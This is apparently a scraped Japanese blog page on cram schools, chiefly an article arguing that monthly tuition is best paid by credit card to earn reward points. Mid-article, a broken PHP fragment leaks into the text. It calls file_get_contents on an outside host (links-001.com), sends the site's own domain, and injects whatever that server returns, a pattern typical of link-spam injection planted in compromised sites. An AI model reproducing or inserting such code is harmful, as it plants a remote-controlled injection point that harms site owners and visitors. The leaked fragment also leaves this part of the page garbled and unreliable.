前へ
次へ

学習塾へ通う理由を考える

何故、子供たちは学習塾へ通うのでしょう。
それは親や自分自身が行きたいと考える中学校や高校に入

more

進学目的の学習塾なら合格実績をチェック

予備校においては大学への進学実績を広告に出すときがあり、ある予備校では以上に人数が多く表示されるとき

more

通わせる意味がある学習塾

年間の中でもっとも子ども達が時間を割ける時期、そこで学習塾に通わせるのが効率のよい教育の進め方です。

more

なぜ学習塾の月謝の支払いはカードがおすすめか

学習塾に通うなら、もちろん月謝も支払う必要があります。
基本的には月1回のペースでお金を支払う事になり、しばらくそれが続きます。
3年ぐらいは塾に通うなら、少なくとも36回ぐらいは塾にお金を支払う訳です。
ところで塾に対する月謝の支払い方法も、複数あります。
多くの塾では、現金での支払いになります。
現金を直接手渡しして支払われる事もあれば、銀行振り込みもあります。
そうかと思えば、塾によってはクレジット払いに対応している事もあります。
具体的にどのような支払い方法が採用されているかは、学習塾によって異なる訳です。
ところで月謝は、毎月定期的に支払っていく事になります。
それを考慮しますと、塾に対する支払いはクレジットカードがおすすめです。
ポイントも還元される事を考慮すれば、お金も節約できるからです。
現金ですと、それは少々困難です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

クレジットカードには、必ずと言って良いほど還元ポイントがあります。
還元ポイントはパーセンテージで表現され、多くのカードは0.5%程度になっています。
それだけに年間に換算すると、比較的大きなポイントを貯める事も可能です。
例えば毎月の月謝が2万円で、0.5%のクレジットカードで支払えば、毎月100円は貯める事ができます。
それが積み重なると、決して軽視できない金額になります。
12ヶ月分であれば、合計1200円になるでしょう。
しかし現金で月謝を支払った時は、そのポイントは付きません。
ある意味、ライフライン料金をクレジットカードで支払う考え方に似ています。
電気代やガス料金などは、ほぼ毎月のように支払うことになりますから、クレジットカード払いにしておけば定期的にポイントを受け取れる訳です。
ライフラインの料金も、そこそこまとまった金額になりますから、1年間で多くのポイントを貯める事もできます。
それと同じく、学習塾の料金もクレジットカードで支払えば、比較的多く還元される訳です。
ですから月謝の支払い方法は、カードがおすすめです。

Page Top